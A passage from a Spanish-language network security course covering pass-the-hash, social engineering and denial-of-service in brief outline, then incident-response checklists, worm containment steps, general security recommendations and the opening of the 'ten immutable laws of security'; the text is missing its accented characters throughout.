Permite al usuario conseguir el acceso al sistema sin romper la contrasea insertando un Hash capturado directamente en la memoria. Esta tcnica puede apresurar un ataque porque el atacante no necesita primero comprometer el password de una cuenta.
9.2.13. Tcnicas de Hacking: Social Engineering
Es de naturaleza humana. Nosotros, como generalizacin, conseguir la satisfaccin de participar en el xito de otros. Los atacantes ruegan a menudo esta opcin. No realizando prcticamente accin alguna, obtienen informacin que de otra manera no estara disponible. Un atacante social listo puede trampear a menudo a individuos en la organizacin para divulgar la informacin que pertenece a los nombres de servers, nmeros de mdem, direcciones IP, configuraciones de red, polticas de password, nombres de cuentas u otra informacin privilegiada que sea beneficiosa en un ataque.
9.2.14. Tcnicas de Hacking: Denial of Service
Un atacante no tiene que acceder necesariamente a un sistema para causar problemas significativos. Los ataques Denial of Service (DoS) realizan tareas en los servicios con el fin de evitar su normal funcionamiento. Los ejemplos incluiran todas las conexiones de red en un server o asegurarse que un mail Server reciba ms mails de los que puede manejar. Los ataques DoS pueden ser un ataque directo o causado por virus, gusanos o Trojan horses.
Los objetivos de los ataques Denial of service pueden ser:
CPU
Espacio en disco
Ancho de banda de red
Cualquier recurso o servicio
9.3. Lista de comprobacin de respuestas a incidentes
Cap1-26.jpg
Disponer de planes y procedimientos de respuesta a incidentes claros, completos y bien comprobados es la clave para permitir una reaccin rpida y controlada ante las amenazas.
Para limitar el efecto de un ataque, es importante que la respuesta sea rpida y completa. Para que esto suceda, se debe realizar una supervisin y auditora de los sistemas.
Una vez identificado un ataque, la respuesta al mismo depender del tipo de ataque.
Comunicar que el ataque se ha producido a todo el personal pertinente.
Contener los efectos del ataque en la medida de lo posible.
Tomar medidas preventivas para asegurar que el ataque no pueda repetirse.
Crear documentacin para especificar la naturaleza del ataque, cmo se identific y cmo se combati.
9.4. Contencin de los efectos de un ataque
Cuando un sistema sufre un ataque, se debe apagar y quitar de la red, y se debe proteger el resto de los sistemas de la red.
Los servidores afectados se deben conservar y analizar, y es necesario documentar las conclusiones.
Puede ser muy difcil cumplir las normas legales para la conservacin de pruebas mientras se continan las actividades cotidianas. Con la ayuda de asesores legales, se debe desarrollar un plan detallado que permita conservar las pruebas del ataque y que cumpla los requisitos legales de su jurisdiccin, de modo que pueda ponerse en prctica un plan cuando la red sufra un ataque.
10. Ejemplos de ataquesEn este tema, se describirn varios escenarios de ataque. Especficamente, se tratarn los escenarios siguientes:
Un gusano ataca el puerto UDP 135
Un gusano del correo electrnico Un ataque infecta un equipo antes de aplicar revisiones o correcciones
10.1. Ataque de un gusano al puerto UDP 135
Permetro
El servidor de seguridad de red debe bloquearlo de acuerdo con su diseo
Red
Buscar y detectar los sistemas vulnerables
Desactivar las conexiones de red en los hosts vulnerables
Utilizar cuarentena de RRAS para asegurar que los hosts de acceso telefnico tengan aplicadas las revisiones adecuadas
Host
Utilizar IPSec para permitir el uso del puerto UDP 135 entrante slo en los hosts que requieran RPC
Utilizar Firewall de Windows para bloquear el trfico entrante que no se desea que llegue a los hosts (en Windows XP y versiones posteriores). En este ejemplo, se ha producido la proliferacin de una variedad del virus Blaster. Se pueden tomar medidas en diversos niveles del modelo de defensa en profundidad para impedir que un gusano ataque el puerto de Protocolo de datagramas de usuario (UDP, User Datagram Protocol) 135.
10.2. Gusano de correo electrnico Permetro
Examinar todos los archivos adjuntos en la puerta de enlace SMTP
Red
Utilizar la cuarentena de RRAS para comprobar las revisiones aplicadas y las firmas de virus
Aplicacin
Microsoft Office 98
Comprobar que est instalada la actualizacin de seguridad de Microsoft Outlook 98.
Office 2000.
Comprobar que est instalado al menos el Service Pack 2
Office XP y Office 2003
La configuracin predeterminada de zona de seguridad es sitios restringidos (en lugar de Internet) y las secuencias de comandos activas dentro de los sitios restringidos, tambin estn deshabilitadas de forma predeterminada
Usuarios
Ensear a los usuarios que los archivos adjuntos pueden ser peligrosos.
Si se recibe un archivo adjunto que no se ha pedido, escribir a su autor para comprobar el propsito antes de abrirlo
En los ltimos aos han aparecido muchos virus relacionados con el correo electrnico. Se pueden tomar medidas en varios niveles del modelo de defensa en profundidad para protegerse frente a los gusanos de correo electrnico. Estas precauciones requieren programas de aprendizaje especficos para que los usuarios conozcan el riesgo y sigan los procedimientos apropiados.
10.3. Han entrado en mi sistema antes de poder aplicar ninguna revisin
Permetro
Habilitar o bloquear el servidor de seguridad
Red
Desconectar el cable de red Host
Iniciar el sistema e inicie sesin
Se pueden necesitar credenciales administrativas locales si las almacenadas en cach estn deshabilitadas
Active Firewall de Windows para bloquear todo el trfico entrante
Volver a conectar el cable de red
Descargar e instalar las revisiones apropiadas
Reiniciar el sistema
Desactivar Firewall de Windows segn la directiva
Es posible que un ataque infecte un equipo antes de que se puedan aplicar las revisiones o correcciones.
Para impedir que se produzcan daos en otros equipos de la red mientras se lo repara, seguir estos pasos:
1. Desconectar el cable de red.
2. Iniciar el sistema e iniciar sesin. Se pueden necesitar credenciales administrativas locales si las almacenadas en cach estn deshabilitadas.
3. Activar Firewall de Windows para bloquear todo el trfico entrante.
4. Volver a conectar el cable de red.
5. Descargar e instale la revisin.
6. Reiniciar el sistema.7. Desactive Firewall de Windows de acuerdo con la directiva.
11. RecomendacionesEn este tema, se enumerarn las recomendaciones para mejorar la seguridad. Especficamente, se tratar:
Recomendaciones de seguridad.
Lista de comprobacin de la seguridad.
11.1. Recomendaciones de seguridad
Defensa en profundidad
Seguro por diseo
Privilegios mnimos
Aprender de los errores cometidos
Mantener la seguridad
Hacer que los usuarios se centren en la concienciacin de seguridad
Desarrollar y probar planes y procedimientos de respuesta a incidentes
Se deber seguir el modelo de defensa en profundidad. Cada nivel del modelo est protegido por los niveles contiguos y depende de todos los niveles que se implementan.
Hay un compromiso constante entre la funcionalidad y la seguridad. Ambos raramente se complementan. Aunque quizs en alguna ocasin lo importante haya sido la funcionalidad, ahora se busca definitivamente la seguridad. As se facilita una implementacin segura por diseo. El software y los sistemas son seguros de forma predeterminada y por diseo, con lo que se simplifica la creacin de un entorno de red seguro.
Los procesos y las aplicaciones que se ejecutan en un sistema logran este objetivo mediante un nivel definido de privilegios sobre el sistema. A menos que se configuren de otro modo, los procesos iniciados, mientras un usuario est conectado al sistema, se ejecutan con los mismos privilegios que tiene el usuario. Para impedir ataques accidentales, todos los usuarios del sistema deben iniciar sesin en l con los privilegios mnimos necesarios para realizar sus funciones. Los virus se ejecutan con los privilegios del usuario que haya iniciado la sesin. En consecuencia, los virus tendrn un mbito mucho ms amplio si el usuario inicia sesin como administrador.
Las aplicaciones y los servicios tambin se deben ejecutar con los privilegios mnimos necesarios.
Es muy importante que se entienda que la seguridad no es un objetivo: es un medio. Un entorno nunca es completamente seguro. Siguen apareciendo nuevos virus, revisiones y puntos dbiles en los sistemas. Aprenda de la experiencia y conserve una documentacin exhaustiva de todo lo que suceda.
Para mantener la seguridad, implementar procedimientos de supervisin y auditora, y comprobar que los resultados de estos procedimientos se procesan con regularidad.
Disponer de planes y procedimientos de respuesta a incidentes claros, completos y bien comprobados, es la clave para permitir una reaccin rpida y controlada ante las amenazas.
11.2. Lista de comprobacin de seguridad
La seguridad comienza por el aprendizaje y la prctica. No se debe dejar nada al azar ni permitir que los usuarios tomen sus propias decisiones sobre este tema. Documentar todo lo que ocurra y crear procedimientos y procesos para todas las funciones empresariales. Siempre que los usuarios tengan que hacer algo, deben disponer de un documento que les proporcione instrucciones paso a paso.
Tomar la delantera mantenindose informado de los problemas relacionados con la seguridad. Microsoft enviar boletines de seguridad a travs del correo electrnico a los suscriptores. Muchos ataques se efectan aprovechando defectos de seguridad para los que existe alguna revisin. Comprobar que se dispone de las herramientas de administracin de revisiones ms actualizadas.
No olvidar realizar una defensa en profundidad. Implementar procedimientos de seguridad en todos los niveles del modelo, ya que unos dependen de otros. La seguridad de una red viene definida por su punto ms dbil.
No dejar jams de recalcar la importancia de efectuar copias de seguridad con regularidad. La prdida o la modificacin de los datos puede resultar catastrfica para un negocio. Deben llevarse a cabo copias de seguridad habitualmente. Almacenar siempre las copias de seguridad en un lugar donde no estn los datos. Realizar tambin procedimientos de restauracin peridicamente. Averigar cmo podran atacar. Se deben conocer las herramientas de ataque de un sistema y los virus. Investigar dnde se producen los ataques y cmo. La encuesta sobre seguridad y delitos informticos de CSI/FBI puede ser un buen lugar para comenzar.
12. Diez normas de seguridad inmutablesEn este tema final, se enumerarn las diez normas inmutables de seguridad.
Cap1-27.jpg
1. Cuando se elige ejecutar un programa, se est tomando la decisin de conceder el control del equipo. Una vez que se ejecuta un programa, se puede realizar cualquier accin, hasta un lmite que viene determinado.
2. Al fin y al cabo, un sistema operativo slo es un conjunto de unos y ceros que, al ser interpretados por el procesador, provocan que el equipo realice determinadas acciones. Al cambiar los unos y ceros, har algo diferente. Dnde se almacenan los unos y ceros? Pues en el equipo, junto con todo lo dems. Son simplemente archivos y, si se permite cambiarlos a los otros usuarios que utilizan el equipo, se "pierde la partida".
3. Si alguien dispone de acceso fsico a un equipo, tiene control total sobre l y puede realizar cualquier accin que desee, como modificar datos o robarlos, llevarse el hardware o destruir fsicamente el equipo.
4. Si se administra un sitio Web, se tiene que limitar lo que pueden hacer en l los visitantes. Slo se debe permitir que se ejecute un programa en el siti